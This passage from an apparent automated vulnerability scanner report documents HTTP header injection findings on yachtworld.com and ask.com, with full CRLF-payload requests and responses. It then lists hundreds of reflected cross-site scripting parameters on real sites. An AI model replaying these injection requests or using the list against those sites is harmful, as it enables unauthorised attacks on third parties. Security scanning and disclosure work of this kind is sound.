2d954fcf23f; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Set-Cookie: savedSearch1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=24-32%20ft,regulator, Used,2004,0%20US%20Dollars,United%20States; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

2.11. https://www.yachtworld.com/ [savedLabel1 cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/

Issue detail

The value of the savedLabel1 cookie is copied into the Set-Cookie response header. The payload 278e2%0d%0a3167851441c was submitted in the savedLabel1 cookie. This caused a response containing an injected HTTP header.

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=278e2%0d%0a3167851441c; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:24 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: savedSearch0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=24-32%20ft; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Set-Cookie: savedSearch1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=278e2
3167851441c; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

2.12. http://wzus1.ask.com/i/i.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/i/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ccd1c%0d%0a07743971c78 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ccd1c%0d%0a07743971c78/i.gif?t=v&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259 HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:13:15 GMT
Set-Cookie: wz_uid=0D47D9451CCD32C3B9ACD8C41BD460F3; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Set-Cookie: wz_sid=0E49DA4619CD32C3B9ACD8C41BD460F3; path=/; expires=Thu, 27-Jan-2011 19:43:15 GMT; domain=.ask.com
Set-Cookie: wz_scnt=1; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Location: http://wzus1.ask.com/ccd1c
07743971c78/i.gif?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&
Content-Length: 437
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wzus1.ask.com/ccd1c
07743971c78/i.gif?t
...[SNIP]...

2.13. http://wzus1.ask.com/i/i.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/i/i.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4af04%0d%0ad83a2a5f4ce was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /i/4af04%0d%0ad83a2a5f4ce?t=v&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259 HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:13:15 GMT
Set-Cookie: wz_uid=0743D74113CE32C3B9ACD8C41BD460F3; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Set-Cookie: wz_sid=064AD0401ECE32C3B9ACD8C41BD460F3; path=/; expires=Thu, 27-Jan-2011 19:43:15 GMT; domain=.ask.com
Set-Cookie: wz_scnt=1; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Location: http://wzus1.ask.com/i/4af04
d83a2a5f4ce?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&
Content-Length: 433
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wzus1.ask.com/i/4af04
d83a2a5f4ce?t=S&a
...[SNIP]...

3. Cross-site scripting (reflected) previous next
There are 578 instances of this issue:

http://ads.pointroll.com/PortalServe/ [flash parameter]
http://ads.pointroll.com/PortalServe/ [r parameter]
http://ads.pointroll.com/PortalServe/ [redir parameter]
http://ads.pointroll.com/PortalServe/ [time parameter]
http://govguru.com/north-carolina/boat-registration [REST URL parameter 1]
http://govguru.com/north-carolina/boat-registration [REST URL parameter 1]
http://govguru.com/north-carolina/boat-registration [REST URL parameter 2]
http://govguru.com/north-carolina/boat-registration [REST URL parameter 2]
http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter]
http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter]
http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]
http://jqueryui.com/themeroller/ [bgColorActive parameter]
http://jqueryui.com/themeroller/ [bgColorContent parameter]
http://jqueryui.com/themeroller/ [bgColorDefault parameter]
http://jqueryui.com/themeroller/ [bgColorError parameter]
http://jqueryui.com/themeroller/ [bgColorHeader parameter]
http://jqueryui.com/themeroller/ [bgColorHighlight parameter]
http://jqueryui.com/themeroller/ [bgColorHover parameter]
http://jqueryui.com/themeroller/ [bgColorOverlay parameter]
http://jqueryui.com/themeroller/ [bgColorShadow parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]
http://jqueryui.com/themeroller/ [bgTextureActive parameter]
http://jqueryui.com/themeroller/ [bgTextureContent parameter]
http://jqueryui.com/themeroller/ [bgTextureDefault parameter]
http://jqueryui.com/themeroller/ [bgTextureError parameter]
http://jqueryui.com/themeroller/ [bgTextureHeader parameter]
http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]
http://jqueryui.com/themeroller/ [bgTextureHover parameter]
http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]
http://jqueryui.com/themeroller/ [bgTextureShadow parameter]
http://jqueryui.com/themeroller/ [borderColorActive parameter]
http://jqueryui.com/themeroller/ [borderColorContent parameter]
http://jqueryui.com/themeroller/ [borderColorDefault parameter]
http://jqueryui.com/themeroller/ [borderColorError parameter]
http://jqueryui.com/themeroller/ [borderColorHeader parameter]
http://jqueryui.com/themeroller/ [borderColorHighlight parameter]
http://jqueryui.com/themeroller/ [borderColorHover parameter]
http://jqueryui.com/themeroller/ [cornerRadius parameter]
http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]
http://jqueryui.com/themeroller/ [fcActive parameter]
http://jqueryui.com/themeroller/ [fcContent parameter]
http://jqueryui.com/themeroller/ [fcDefault parameter]
http://jqueryui.com/themeroller/ [fcError parameter]
http://jqueryui.com/themeroller/ [fcHeader parameter]
http://jqueryui.com/themeroller/ [fcHighlight parameter]
http://jqueryui.com/themeroller/ [fcHover parameter]
http://jqueryui.com/themeroller/ [ffDefault parameter]
http://jqueryui.com/themeroller/ [fsDefault parameter]
http://jqueryui.com/themeroller/ [fwDefault parameter]
http://jqueryui.com/themeroller/ [iconColorActive parameter]
http://jqueryui.com/themeroller/ [iconColorContent parameter]
http://jqueryui.com/themeroller/ [iconColorDefault parameter]
http://jqueryui.com/themeroller/ [iconColorError parameter]
http://jqueryui.com/themeroller/ [iconColorHeader parameter]
http://jqueryui.com/themeroller/ [iconColorHighlight parameter]
http://jqueryui.com/themeroller/ [iconColorHover parameter]
http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]
http://jqueryui.com/themeroller/ [offsetTopShadow parameter]
http://jqueryui.com/themeroller/ [opacityOverlay parameter]
http://jqueryui.com/themeroller/ [opacityShadow parameter]
http://jqueryui.com/themeroller/ [thicknessShadow parameter]
http://ss.ask.com/query [fn parameter]
http://ss.ask.com/query [q parameter]
http://www.ask.com/ans [l parameter]
http://www.ask.com/pictures [l parameter]
http://www.ask.com/pictures [q parameter]
http://www.ask.com/pictureslanding [l parameter]
http://www.ask.com/web [q parameter]
http://www.ask.com/web [qid parameter]
http://www.boats.com/boat-transport/index.jsp [yw_country parameter]
http://www.boats.com/boat-transport/index.jsp [yw_country parameter]
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 3]
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 4]
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 5]
https://www.linkedin.com/secure/login [REST URL parameter 1]
http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]
http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]
http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]
http://www.yachtworld.com/bluewater/email.cgi [office_id parameter]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 4]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5]
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 4]
http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 5]
http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 6]
http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [name of an arbitrarily supplied request parameter]
http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States [REST URL parameter 4]
